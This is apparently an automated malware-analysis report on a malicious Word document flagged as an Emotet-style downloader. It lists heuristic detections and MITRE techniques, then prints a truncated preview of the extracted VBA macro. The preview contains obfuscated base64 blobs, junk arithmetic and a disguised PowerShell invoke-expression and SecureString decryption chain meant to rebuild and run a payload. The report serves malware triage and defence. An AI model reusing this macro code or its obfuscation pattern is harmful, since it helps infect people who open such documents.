Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. Heuristics confirm the presence of VBA macros and a CreateObject call, commonly used for downloading and executing payloads. The ClamAV detection further supports its malicious nature.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39171 bytes |

SHA-256: 83f919252c64bd11252ae778de5b67d5484c0d3ef5761c50b04df85a6f5fd21d

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 22 long base64-like blob(s).

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "FJOhqTzr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "VPWWqdSY"
Function MwDKPBjAza()
On Error Resume Next
iDwioc = kOznlU
JospKw = 71175
wDWKr = 87263 + 59365 * mAopi + CDate(YkiWP + CDbl(59311)) * 14517 - 33579
ijSOCNVSDr = TiwmvK("fQA1ADQAYwBjADUANwBlAGYAMgAwADEAOAA5AGUANwBkADIAYgBmADEAZgA3ADAAMQA4AGUANQA2AGEAMgA5ADgAMQAzADQANwA0AGIAMwAyADkAYgBiADQAOAAxADAAZQBmADEANwA1ADMANQAzAGEANwAwADQAMQA0ADAAYgA3ADMAZgA0AGQANgA1ADcAOABiAXESw8L", 2, 195)
jHYKPz = pPLMEs
dloFz = 24163
wfrzQI = 14930 + 76691 * GOjXmD + CDate(iPPKK + CDbl(48964)) * 58100 - 42365
waXsw = VzfibL
SibwN = 46389
Yjkzj = 48968 + 25320 * zcGzOW + CDate(SBfkV + CDbl(72496)) * 60924 - 75667
jvzDqzs = TiwmvK("zksDikAMAA0AGQANAA4ADMAOQAxADkAZgBlADQAYwBiADcAZQA5AGUAYgAwAGQAOQBlAGIANAAxAGIAOQA5AGMAMQBmADgANgA0ADcANAA1ADcASzX2", 6, 106)
GLowlz = ErktP
YIWclz = 5399
cwqILa = 37424 + 55222 * nswws + CDate(kOwAQ + CDbl(4055)) * 14492 - 57486
czqOW = zCmlk
BMoibd = 25550
DNCuhB = 57376 + 28123 * XmWcdI + CDate(ozLlnH + CDbl(17849)) * 97348 - 87028
WoGQTwHCZwm = TiwmvK("LvGG -KEy 226,29,100,173,135,27,21,140,126,179,111,171,174,214,61,196,8,20,85,84,221,99,196Umf82", 4, 89)
YiYBiL = JPOzwh
jkQOz = 26816
YDMqd = 34849 + 53272 * wEDBp + CDate(vqjpbd + CDbl(35512)) * 27189 - 88532
qZYQW = JpqZk
azAnc = 20948
wocbAm = 93481 + 4841 * sQTch + CDate(tYAiru + CDbl(486)) * 62058 - 71544
GmFBw = TiwmvK("oAwADgAZQBlADMAOABmAGEAYwA5ADkAMQBmAGYAZQA3ADIAMQAxADAAZAA4AGYAZgA3AGUAMAAwADAAZQBlADIAYQA0ADIAF7t7JlE", 2, 94)
iaudN = ohsRM
zXdaM = 98284
ZGHhqF = 53854 + 74673 * TEvIrG + CDate(LCZwn + CDbl(52251)) * 73322 - 69336
DMRaf = zNzZlr
RvbUAO = 33507
EHbwzT = 92990 + 78489 * OCaNdL + CDate(VnWkKm + CDbl(39729)) * 17854 - 13491
RYJzmtFukH = TiwmvK("SNEAYwA4ADQHniKw", 3, 9)
uzbHjk = WzFqd
VDYJKj = 32508
okwzMr = 64205 + 52390 * mSpNZ + CDate(NhfRHq + CDbl(58347)) * 10916 - 78156
dXcCV = noMsrE
laPoz = 66959
cVzMX = 84753 + 45335 * pEwkNa + CDate(DzzJRt + CDbl(72501)) * 68796 - 82591
qUCiD = TiwmvK("G & ( $PshoMe[21]+$PshoMe[30]+'X') (( [ruNtIme.INTERopSeRVICES.mARSHaL]::pTrTOStrInGBstR( [ruNTIme.InTERoPSErvIcES.mAr6kJDAHLz", 2, 117)
wCPKqE = zXmHXP
dUBzIv = 14213
oJWRqn = 33859 + 46886 * mIhbpH + CDate(zAEmqo + CDbl(39951)) * 61665 - 65224
KBYhLL = YUsNJH
ZkINkP = 34844
IHROko = 74645 + 93457 * vYBpQb + CDate(hZbNwL + CDbl(78923)) * 89900 - 12272
ZERKBaoZ = TiwmvK("fczDQAYgAwAGUAZAA5ADYAZgA2ADUAOQBlAGYANgA1ADMANgAwADAANgA3AGMAMQA5ADkAYQBiADkANgBjADcAOAA3ADIAYgBhADkAMwBjAGEAOAA0ADgAMQA0ADQAMQBkADQAMABfDi", 4, 134)
YEilaD = TsQPw
zlYtSk = 11673
IIafLn = 8709 + 85014 * SXHIQi + CDate(NUVcW + CDbl(45219)) * 20398 - 35570
JRDfhm = PDXsJW
JmhwiS = 8658
rVSlh = 42737 + 81114 * zCCPl + CDate(IuOsJ + CDbl(16344)) * 24854 - 29364
vwMzfUHm = TiwmvK("LiGImhaL]::sECuResTrIngTOBsTR( $('76492d1116743f0423413b16050a5345MgB8AGoAYwBwAEMAVgBuAFAAWAB5AGIANAB5ACsAeAA2AE4ARQBLAEMAYwBkAHcAPQA9AHwAMwA1ADYAOQBkADMANgAyADMAZAAzADAANQA5ADEANABkADAAMgA4ADAAOAA0AG4CE", 6, 195)
lAPUKT = UlnIa
MwFMZz = 50825
GGzAdm = 69866 + 80323 * wocoj + CDate(RBfmli + CDbl(32871)) * 55119 - 56843
KviTod = EfDAsJ
TEKCYY = 41944
NMbzdS = 61109 + 99147 * YHPZnW + CDate(LIrwTh + CDbl(77276)) * 45888 - 80157
vuXqSpfCvD = TiwmvK("GcAADkAMgA1AGUAMgBmADAAMgzLj.", 5, 21)
LWzZr = YXhRs
AiZjac = 70823
GfhWrP = 64309 + 44654 * fYDJH + CDate(JADjC + CDbl(82092)) * 5454 - 11069
DVcfZ = CzwIC
DODWOX = 57096
ioarzL = 44155 + 57866 * GXJjb + CDate(ibhfbN + CDbl(84739)) * 25755 - 97078
QhNiqmIjIuw = TiwmvK("zAzADUAZQBhADQANwBmAGEAMQBkADAAYQAyADMAMAA2ADMAMABlADAAMQBjAGIANQBlAGUAOQA1ADAANABmADYAOAAxADEANQBhADQAYwBiADQANAA4ADgANwBhADYAYQBhADQANQBjADcANQBhAGIAZQAxqfSuEiDU", 2, 154)
XAdIkw = idYPvk
OtYdpk = 85971
ccZuh = 85202 + 4960 * mabLaK + CDate(VjHvaG + CDbl(5197)) * 43104 - 66007
RzsiX = IYdnqN
CDOpBw = 74844
tIHBjw = 5412 + 9
... (truncated)